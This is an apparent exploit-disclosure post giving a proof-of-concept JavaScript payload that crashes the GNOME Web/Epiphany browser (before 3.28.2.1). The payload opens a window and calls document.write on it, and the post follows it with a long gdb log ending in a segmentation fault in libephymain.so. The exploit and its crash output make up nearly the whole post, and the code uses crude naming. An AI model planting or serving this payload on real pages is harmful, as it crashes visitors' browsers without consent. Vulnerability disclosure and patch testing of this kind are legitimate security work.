# Title: Gnome Web/Epiphany Browser < 3.28.2.1 - DoS App Crash (PoC) # Exploit Author: https://github.com/ldpreload # Date: 2018-06-06 # Link: https://wiki.gnome.org/Apps/Web # Version: 3.28.2.1 <!> libephymain.so in GNOME WEB/Epiphany < 3.28.2.1 allows a remote attacker to cause a Denial Of Service and crash the users browser. The cause of this is the "document.write" <!> PoC: <script> b1tch3z = window.open("https://www.google.com", "bl1ngbl1ng", "width=250,height=250"); b1tch3z.document.write("<p>~ua b1tch3z</p>"); // https://github.com/undergroundagency // https://github.com/ldpreload </script> Video PoC: https://vimeo.com/273769801 <!> ld@b1tch3z:~$ gdb epiphany (gdb) run Starting program: /usr/bin/epiphany [Thread debugging using libthread_db enabled] Using host libthread_db library "/usr/lib/libthread_db.so.1". [New Thread 0x7fffdf7ab700 (LWP 23486)] [New Thread 0x7fffdd929700 (LWP 23487)] [New Thread 0x7fffdd128700 (LWP 23488)] [New Thread 0x7fffd7fff700 (LWP 23489)] [New Thread 0x7fffd77fe700 (LWP 23490)] [New Thread 0x7fffd6ffd700 (LWP 23491)] [New Thread 0x7fffd67fc700 (LWP 23492)] [New Thread 0x7fffd5ffb700 (LWP 23493)] [New Thread 0x7fffd57fa700 (LWP 23494)] [New Thread 0x7fff8b4c4700 (LWP 23499)] [New Thread 0x7fff899bc700 (LWP 23503)] [New Thread 0x7fff88fff700 (LWP 23506)] [New Thread 0x7fff6bfff700 (LWP 23507)] [New Thread 0x7fff6ae5f700 (LWP 23514)] [New Thread 0x7fff6a65e700 (LWP 23521)] [Thread 0x7fff6a65e700 (LWP 23521) exited] [Thread 0x7fffd5ffb700 (LWP 23493) exited] [New Thread 0x7fffd5ffb700 (LWP 23527)] [New Thread 0x7fff6a65e700 (LWP 23528)] [New Thread 0x7fff691f6700 (LWP 23529)] [New Thread 0x7fff689f5700 (LWP 23530)] [New Thread 0x7fff43fff700 (LWP 23531)] [New Thread 0x7fff3b7fe700 (LWP 23532)] [New Thread 0x7fff437fe700 (LWP 23533)] [Thread 0x7fff3b7fe700 (LWP 23532) exited] [Thread 0x7fff899bc700 (LWP 23503) exited] [Thread 0x7fff691f6700 (LWP 23529) exited] [Thread 0x7fff689f5700 (LWP 23530) exited] [Thread 0x7fff437fe700 (LWP 23533) exited] [Thread 0x7fff43fff700 (LWP 23531) exited] [Thread 0x7fff6a65e700 (LWP 23528) exited] [New Thread 0x7fff6a65e700 (LWP 23557)] [Thread 0x7fffd5ffb700 (LWP 23527) exited] [New Thread 0x7fffd5ffb700 (LWP 23566)] [Thread 0x7fff6a65e700 (LWP 23557) exited] [Thread 0x7fffd5ffb700 (LWP 23566) exited] [New Thread 0x7fffd5ffb700 (LWP 23591)] [New Thread 0x7fff6a65e700 (LWP 23592)] [Thread 0x7fffd5ffb700 (LWP 23591) exited] [New Thread 0x7fffd5ffb700 (LWP 23597)] [Thread 0x7fffd5ffb700 (LWP 23597) exited] [New Thread 0x7fffd5ffb700 (LWP 23612)] [Thread 0x7fff6a65e700 (LWP 23592) exited] [Thread 0x7fffd5ffb700 (LWP 23612) exited] [New Thread 0x7fffd5ffb700 (LWP 23625)] [New Thread 0x7fff6a65e700 (LWP 23633)] [Thread 0x7fff6a65e700 (LWP 23633) exited] [New Thread 0x7fff6a65e700 (LWP 23644)] [Thread 0x7fff6a65e700 (LWP 23644) exited] [New Thread 0x7fff6a65e700 (LWP 23648)] [Thread 0x7fffd5ffb700 (LWP 23625) exited] [New Thread 0x7fffd5ffb700 (LWP 23652)] [Thread 0x7fff6a65e700 (LWP 23648) exited] [New Thread 0x7fff6a65e700 (LWP 23656)] [Thread 0x7fff6a65e700 (LWP 23656) exited] [Thread 0x7fffd5ffb700 (LWP 23652) exited] [New Thread 0x7fffd5ffb700 (LWP 23684)] [New Thread 0x7fff6a65e700 (LWP 23685)] [Thread 0x7fffd5ffb700 (LWP 23684) exited] [New Thread 0x7fffd5ffb700 (LWP 23715)] [Thread 0x7fff6a65e700 (LWP 23685) exited] [New Thread 0x7fff6a65e700 (LWP 23741)] [Thread 0x7fffd5ffb700 (LWP 23715) exited] [New Thread 0x7fffd5ffb700 (LWP 23773)] [Thread 0x7fffd5ffb700 (LWP 23773) exited] [New Thread 0x7fffd5ffb700 (LWP 23811)] [Thread 0x7fff6a65e700 (LWP 23741) exited] [New Thread 0x7fff6a65e700 (LWP 23815)] [Thread 0x7fffd5ffb700 (LWP 23811) exited] [New Thread 0x7fffd5ffb700 (LWP 23823)] [Thread 0x7fff6a65e700 (LWP 23815) exited] Thread 43 "pool" received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7fffd5ffb700 (LWP 23823)] 0x00007ffff77bcb2d in ?? () from /usr/lib/epiphany/libephymain.so (gdb) bt #0 0x00007ffff77bcb2d in () at /usr/lib/epiphany/libephymain.so #1 0x00007ffff6cb7e39 in () at /usr/lib/libgio-2.0.so.0 #2 0x00007ffff7040463 in () at /usr/lib/libglib-2.0.so.0 #3 0x00007ffff703fa2a in () at /usr/lib/libglib-2.0.so.0 #4 0x00007fffefa70075 in start_thread () at /usr/lib/libpthread.so.0 #5 0x00007ffff7b1453f in clone () at /usr/lib/libc.so.6